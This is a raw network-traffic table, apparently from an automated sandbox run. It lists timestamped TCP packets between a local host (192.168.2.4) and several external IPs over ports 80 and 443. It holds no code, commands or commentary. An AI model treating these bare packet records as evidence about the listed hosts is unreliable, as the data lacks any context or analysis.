Aug 1, 2024 04:28:08.871062994 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871097088 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871114969 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871146917 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871164083 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871201992 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871220112 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871237040 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871248960 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871269941 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871287107 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871320963 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871335983 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871373892 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871402979 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871428013 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871445894 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871475935 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871491909 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871525049 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871536970 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871573925 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871573925 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871596098 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871614933 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871628046 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871643066 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871682882 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871701956 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871731997 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871761084 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871802092 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871803045 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871834993 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871862888 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871901035 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871931076 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871946096 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871970892 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871999025 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.872031927 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.872062922 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.872092009 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.872117996 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.872150898 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.872150898 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.872196913 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.881076097 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.881339073 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.881424904 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.881484985 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.881566048 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.881576061 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.881613016 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.881629944 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.881707907 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:09.524210930 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:09.524545908 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:09.524616957 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:09.530035973 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:09.817109108 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:09.817193985 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:09.817285061 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:09.840555906 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:09.840635061 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.463857889 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.467688084 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.467756033 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.469317913 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.469527960 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.474205017 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.474340916 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.477046013 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.477111101 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.477194071 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.477252007 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.479130030 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.479234934 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.483309031 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.483412027 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.487157106 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.487238884 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488209009 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488267899 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488328934 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488351107 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488393068 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488415003 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488507032 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488559008 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488611937 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488611937 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488640070 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488651991 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488652945 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488677025 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488692045 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488742113 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488768101 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488786936 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488816977 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488831997 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488878965 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488878965 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488905907 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488924980 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.488956928 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.488977909 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.489001989 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.489017010 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.489054918 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.489070892 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.489100933 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.489119053 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.489136934 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.489171982 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.489203930 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.489234924 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.489893913 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.500004053 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.500066996 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.500133038 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.500157118 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.500197887 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.500214100 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.500243902 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.500269890 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.500304937 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.500328064 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.500351906 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.500381947 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.500416040 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.500456095 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.502897978 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.510441065 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.510505915 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.510565042 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.510615110 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.510648966 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.510678053 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.510807037 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.511127949 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.511193991 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.511243105 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.511274099 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.511301041 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.511322975 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.511363983 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.511398077 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.511405945 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.511432886 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.511459112 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:10.511465073 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:10.511550903 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:11.371448994 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:11.371499062 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:11.371714115 CEST	443	49748	149.154.167.220	192.168.2.4
Aug 1, 2024 04:28:11.371782064 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:11.371782064 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:11.390058994 CEST	49748	443	192.168.2.4	149.154.167.220
Aug 1, 2024 04:28:11.636169910 CEST	49744	80	192.168.2.4	208.95.112.1
Aug 1, 2024 04:28:11.641998053 CEST	80	49744	208.95.112.1	192.168.2.4
Aug 1, 2024 04:28:11.642066002 CEST	49744	80	192.168.2.4	208.95.112.1
Aug 1, 2024 04:28:12.560339928 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:12.560394049 CEST	49746	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:12.735501051 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:12.735558987 CEST	49745	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:13.091180086 CEST	49745	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:13.091456890 CEST	49746	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:13.096303940 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:13.096369028 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:13.115895987 CEST	49749	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:13.121077061 CEST	80	49749	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:13.121269941 CEST	49749	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:13.121543884 CEST	49749	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:13.126532078 CEST	80	49749	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:13.475258112 CEST	49749	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:13.596060991 CEST	80	49749	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:13.596101999 CEST	80	49749	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:13.925272942 CEST	80	49749	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:14.057415009 CEST	80	49749	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:14.057527065 CEST	49749	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:18.941665888 CEST	80	49749	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:18.941780090 CEST	49749	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:18.944169998 CEST	49750	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:18.948889017 CEST	80	49750	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:18.948951960 CEST	49750	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:18.950993061 CEST	49750	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:18.955724955 CEST	80	49750	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:19.741637945 CEST	80	49750	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:19.955862999 CEST	49750	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:19.956641912 CEST	80	49750	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:19.956733942 CEST	49750	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:20.653506994 CEST	49750	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:20.658615112 CEST	80	49750	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:20.658679008 CEST	80	49750	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:20.658708096 CEST	80	49750	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:20.841118097 CEST	49751	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:20.846200943 CEST	80	49751	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:20.846286058 CEST	49751	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:20.849490881 CEST	49751	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:20.854562998 CEST	80	49751	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:20.925170898 CEST	80	49750	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:21.140621901 CEST	80	49750	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:21.140693903 CEST	49750	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:21.206998110 CEST	49751	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:21.212064981 CEST	80	49751	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:21.212649107 CEST	80	49751	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:21.322640896 CEST	49752	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:21.328264952 CEST	80	49752	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:21.328330040 CEST	49752	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:21.328598976 CEST	49752	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:21.333777905 CEST	80	49752	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:21.410511971 CEST	49749	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:21.651439905 CEST	80	49751	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:21.674571991 CEST	49752	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:21.679770947 CEST	80	49752	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:21.679800987 CEST	80	49752	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:21.680022001 CEST	80	49752	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:21.793061972 CEST	80	49751	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:21.793240070 CEST	49751	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:21.864744902 CEST	49741	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:22.142247915 CEST	80	49752	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:22.252618074 CEST	49752	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:22.277003050 CEST	80	49752	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:22.455749989 CEST	49752	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.019228935 CEST	49750	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.019262075 CEST	49752	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.022075891 CEST	49751	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.022353888 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.024996996 CEST	80	49750	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.025070906 CEST	49750	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.025568008 CEST	80	49752	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.025615931 CEST	49752	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.027369976 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.027436018 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.027564049 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.027757883 CEST	80	49751	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.027801991 CEST	49751	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.032634974 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.395833969 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.401324034 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.401360989 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.401392937 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.401396990 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.401421070 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.401439905 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.401447058 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.401468992 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.401473045 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.401499987 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.401525974 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.401525974 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.401551962 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.401582003 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.401583910 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.401612043 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.401639938 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.406395912 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.406544924 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.406790018 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.406816959 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.406841993 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.406871080 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.406898022 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.406925917 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.406970978 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.448827028 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.451584101 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.496787071 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.499650955 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.548762083 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.551369905 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.561357021 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.563244104 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.568522930 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.568555117 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.568582058 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.568614006 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.568640947 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.568666935 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.568694115 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.568742037 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.568924904 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.569381952 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.569412947 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.569439888 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.684272051 CEST	49754	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.689492941 CEST	80	49754	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.690957069 CEST	49754	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.691045046 CEST	49754	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.695976019 CEST	80	49754	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.722191095 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:25.727494955 CEST	80	49753	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:25.729402065 CEST	49753	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:26.052145004 CEST	49754	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:26.057084084 CEST	80	49754	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:26.060154915 CEST	80	49754	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:26.060168982 CEST	80	49754	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:26.481410027 CEST	80	49754	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:26.615425110 CEST	80	49754	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:26.616899967 CEST	49754	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:27.562093973 CEST	49754	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:27.562464952 CEST	49755	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:27.567363024 CEST	80	49755	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:27.567440033 CEST	49755	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:27.567828894 CEST	49755	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:27.567851067 CEST	80	49754	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:27.567912102 CEST	49754	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:27.573045969 CEST	80	49755	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:27.602416992 CEST	49756	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:27.607868910 CEST	49755	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:27.608571053 CEST	80	49756	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:27.608660936 CEST	49756	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:27.608748913 CEST	49756	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:27.613635063 CEST	80	49756	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:27.656797886 CEST	80	49755	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:27.955836058 CEST	49756	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:28.176361084 CEST	80	49755	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:28.176565886 CEST	49755	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:28.177253008 CEST	80	49756	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:28.177311897 CEST	80	49756	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:28.177339077 CEST	80	49756	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:28.414266109 CEST	80	49756	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:28.547703028 CEST	80	49756	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:28.547945976 CEST	49756	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:29.030494928 CEST	49756	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:29.030890942 CEST	49757	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:29.037508965 CEST	80	49757	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:29.037610054 CEST	49757	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:29.038067102 CEST	49757	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:29.038116932 CEST	80	49756	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:29.038182020 CEST	49756	80	192.168.2.4	194.58.42.154
